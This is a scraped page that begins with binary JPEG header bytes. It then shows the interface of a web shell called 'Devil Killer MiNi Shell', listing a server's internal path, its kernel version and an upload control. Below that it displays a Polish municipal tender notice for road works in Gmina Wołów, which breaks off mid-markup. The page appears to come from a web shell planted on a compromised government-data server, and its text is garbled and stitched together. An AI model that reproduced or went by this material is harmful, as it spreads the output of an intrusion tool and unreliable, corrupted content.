JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230908/0038888501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych na terenie Gminy Wołów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wołów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713191305</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713191303</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wolow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.wolow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych na terenie Gminy Wołów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0ee447a0-4e47-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00388885</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00054209/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Przebudowa dróg gminnych na terenie Gminy Wołów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wolow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wolow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/wolow - wyślij wiadomość do zamawiającego</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>1.	Administratorem danych osobowych jest Zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach oraz rozporządzenie RODO.<br/>2.	Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu: <br/>a)	przeprowadzenie postępowania o udzielenie zamówienia publicznego,<br/>b)	zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu wykonawcą,<br/>c)	dokonania rozliczenia i płatności związanych z realizacją umowy,<br/>d)	przeprowadzenie ewentualnych postępowań kontrolnych i / lub audytu przez komórki Zamawiającego i inne uprawnione podmioty,<br/>e)	udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej,<br/>f)	archiwizacji postępowania.<br/>3.	Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>4.	Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy to wszystkich uczestników postępowania.<br/>5.	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO: <br/>a)	prawo dostępu do danych (art. 15), <br/>b)	prawo sprostowania danych (art. 16),<br/>c)	prawo do usunięcia danych (art. 17),<br/>d)	prawo do ograniczenia przetwarzania danych (art. 18). <br/>e)	prawo wniesienia skargi do organu nadzorczego. <br/>6.	Osobie, której dane dotyczą nie przysługuje:<br/>a)	prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO,<br/>c)	prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.<br/>7.	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>8.	Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub umowy.<br/>9.	Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany jest wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.<br/>10.	Dane osobowe pozyskane w postępowaniu nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>11.	Dane osobowe pozyskane w postępowaniu nie będą przekazywane do Państw trzecich oraz instytucji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.29.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót budowlanych dla zadania pn.: „Modernizacja drogi gminnej w Krzydlinie Wielkiej”.<br/>W ramach zadania przewiduje się wykonanie przebudowy drogi wewnętrznej, którą zaprojektowano w istniejącym pasie drogowym. Przewiduje się usunięcie istniejącej nawierzchni jezdni z płyt betonowych drogowych. <br/>Projektowaną niweletę ukształtowano w sposób umożliwiający odprowadzenie wód opadowych na przydrożne pobocza oraz zieleńce. <br/>Zaprojektowano jezdnię o nawierzchni bitumicznej i szerokości zmiennej, dostosowanej do miejscowych warunków terenowych. Wzdłuż jezdni projektuje się pobocza utwardzone kruszywem łamanym 0/31,5. Projekt zakłada uzupełnienie i rekultywację terenu zielonego w obrębie pasa drogowego. Zaprojektowano zjazdy do posesji o konstrukcji nawierzchni analogicznej jak droga główna. Zjazdy zakończono krawężnikami najazdowymi o wymiarach 15x22 cm ze światłem 2 cm, ułożonymi na ławie z betonu C12/15, grubości 10 cm. Do wyokrąglenia łuków zastosowano promień R=3 m.<br/>Na istniejącej infrastrukturze podziemnej w pasie projektowanej jezdni znajduje się armatura zakończona zaworami, zasuwami i włazami studni, które należy wyregulować wysokościowo dopasowując do nowych rzędnych wysokościowych. <br/>W trakcie regulacji, skrzynki i włazy, które ulegną uszkodzeniu i nie będą nadawały się do ponownego obudowania należy wymienić na nowe. Roboty należy wykonywać w porozumieniu z Zarządcą sieci. Na czas remontu istniejące tabliczki orientacyjne na słupkach należy zdemontować i ponownie zamontować po zakończeniu prac.<br/>Woda opadowa z jezdni i poboczy odprowadzana będzie za pomocą spadków podłużnych i poprzecznych na zieleńce znajdujące się w terenie pasa drogowego. Pochylenie poprzeczne jezdni zaprojektowano jako jednostronne (w stronę istniejącego rowu) lub daszkowe o nachyleniu 2%.<br/>Projekt zakłada rekultywację terenu w granicach pasa drogowego poprzez uzupełnienie gruntem i obsiew trawą na warstwie humusu gr. 10 cm. Drzewa kolidujące z inwestycją należy usunąć. Wycinka zieleni objęta jest odrębną procedurą administracyjną jednak nasadzenia i wycinka są objęte niniejszym postępowaniem.<br/>Pod zjazdem z drogi powiatowej należy wykonać remont istniejącego przepustu. Zaprojektowano wymianę istniejącego przepustu na HDPE Ø600. Długość przepustu wynosi 6,4 m. Rura przepustu powinna być ułożona w spadku 1,5% w kierunku zachodnim, na 5 cm warstwie podsypki piaskowej oraz 10 cm warstwie fundamentu z kruszywa łamanego 0/31,5 mm. Wlot i wylot projektowanego przepustu zaplanowano jako zabezpieczone ściankami czołowymi prefabrykowanymi o grubości 14 cm, posadowionymi na fundamencie betonowym. Na długości 2 m przed wlotem i wylotem przepustu zaprojektowano renowację i umocnienie jego skarp płytami MEBA wypełnionymi humusem i obsianymi trawą. Na dnie przy wlocie i wylocie należy ułożyć płyty MEBA wypełnione żwirem, na warstwie kruszywa zagęszczonego do wskaźnika zagęszczenia Is=1,00 gr. 10 cm. <br/>Pozostałe fragmenty należy przywrócić do stanu istniejącego poprzez humusowanie i obsiew trawą.<br/>W ramach kontraktu przewiduje się wprowadzenie zastępczej i docelowej organizacji ruchu.<br/><br/>Szczegółowe informacje o projektowanych rozwiązaniach technicznych zawarto w dokumentacji projektowej, która stanowi załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach inwestycji przewidziano przebudowę ul. Mickiewicza na długości ok. 388 mb. Jezdnię obramowano krawężnikiem granitowym 15x30 cm na ławie betonowej z oporem wystawionym na 12 cm nad nawierzchnię. Zakłada się wykorzystanie istniejących krawężników. <br/>Zaprojektowano chodnik przyległy do jezdni o szerokości 2,0 m od początku opracowania do skrzyżowania z ul. Wiejską, 3,0 m od skrzyżowania z ul. Chopina do zjazdu w km 0+383,20 oraz 2,5 m od zjazdu w km 0+383,20 do końca opracowania. <br/>Zjazdy indywidualne zaprojektowano z kostki betonowej do granicy pasa drogowego. Przyjęto szerokość zjazdów 3,5 – 4,5 m. Od strony jezdni zaprojektowano krawężnik obniżony o wymiarach 15x22 cm na ławie betonowej z oporem wystawiony na 2 cm nad nawierzchnię. <br/>W celu obsługi terenów i działek przylegających do pasa drogowego zaprojektowano przebudowę zjazdów.<br/>Pochylenie poprzeczne jezdni zaprojektowano jako jednostronne o spadku 2% na łuku poziomym w kilometrze 0+070,99 – 0+076,01 i daszkowe o spadku 2% na pozostałym odcinku. Zmianę pochylenia zaprojektowano na długości krzywej przejściowej.<br/>Chodniki obramowano obrzeżami betonowymi szerokości 8 cm ułożonymi na ławie betonowej z oporem. <br/>Spadek poprzeczny na zjazdach dostosowany jest do konfiguracji terenu. Maksymalne pochylenie na zjazdach wynosi 5%, przy czym w obrębie chodnika należy zachować spadek jak dla chodnika. <br/>Droga w profilu jest zbliżona do terenu istniejącego ze względu na konieczność zapewnienia powiązania z istniejącymi skrzyżowaniami, zjazdami. Pochylenia niwelety przyjęto w przedziale 0,71 – 3,68%. Załomy wygładzono łukami pionowymi o promieniach łuków 600 – 5 000 m. <br/>Pochylenie poprzeczne i podłużne dobrano tak, aby wody opadowe z projektowanych nawierzchni odprowadzać powierzchniowo do projektowanej kanalizacji deszczowej w ul. Mickiewicza.<br/>Komunikacja terenów przyległych pozostaje bez zmian. Pozostawiono istniejące zjazdy z dróg dostosowując nawierzchnię i ukształtowanie do projektowanych ciągów.<br/>Zaprojektowano tereny zielone pełniące funkcję izolacyjną. <br/>Zaprojektowano pas terenu zielonego o szerokości 1,2 – 1,7 m od krawędzi jezdni do granicy pasa drogowego. W pasie tym znajdują się znaki drogowe.<br/>Na przedmiotowym odcinku występują istniejące parkingi. Przewidziano uzupełnienie nawierzchni parkingów w granicach pasa drogowego.<br/>Woda opadowa z terenów utwardzonych zlokalizowanych w pasie drogowym ul. Mickiewicza odprowadzana będzie powierzchniowo do ulicznych wpustów deszczowych i do projektowanej sieci kanalizacji deszczowej, która włączona zostanie do istniejącego systemem kanalizacji deszczowej w pobliżu skrzyżowania ul. Mickiewicza z ul. Księcia B. Wysokiego.<br/>W celu odwodnienia projektowanego odcinka drogi projektuje się budowę sieci kanalizacji deszczowej o długości ok. 345m. W związku z powyższym do likwidacji przeznaczono ok. 65 m istniejącej sieci kanalizacji deszczowej kd160 – kd300 między skrzyżowaniem ul. Mickiewicza z ul. Wąską i skrzyżowaniem ul. Mickiewicza z ul. Ks. B. Wysokiego. Sieć kanalizacji deszczowej przewidziano wykonać z rur PP klasy SN10 (10 kN/m2) DN200 ÷ DN600 łączonych na uszczelkę i studni betonowych, szczelnych, prefabrykowanych o średnicy DN1000 oraz DN1200, wyposażonych w włazy żeliwne klasy D400 i stopnie złazowe. Wody opadowe i roztopowe z pasa drogowego skierowane będą do ulicznych wpustów deszczowych za pomocą systemu pochyleń podłużnych i spadków poprzecznych. Studzienki wpustów deszczowych wyposażone będą w osadniki i kosze do wyłapywania zanieczyszczeń. Studzienki wpustów deszczowych wykonać należy z szczelnych, prefabrykowanych wpustów betowych DN500 i wyposażyć w kraty żeliwne klasy D400. Ze względu na włączenie się projektowaną siecią kanalizacji deszczowej do istniejącej sieci kanalizacji deszczowej kd300 w pobliżu skrzyżowania ul. Mickiewicza z ul. Księcia Bolesława Wysokiego projektuje się wykonanie zbiornika retencyjnego wraz z regulatorem przepływu Qo = 15 dm3/s. Zbiornik retencyjny będzie miał na celu przetrzymanie wód deszczowych i roztopowych z części przebudowanej ul. Mickiewicza przed wlotem do istniejącej sieci kanalizacji deszczowej. Do projektowanej sieci kanalizacji deszczowej przepięta zostanie także istniejąca sieć kd300 z ul. Chopina oraz zostanie wykonane odejście do podpięcia ul. Wiejskiej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 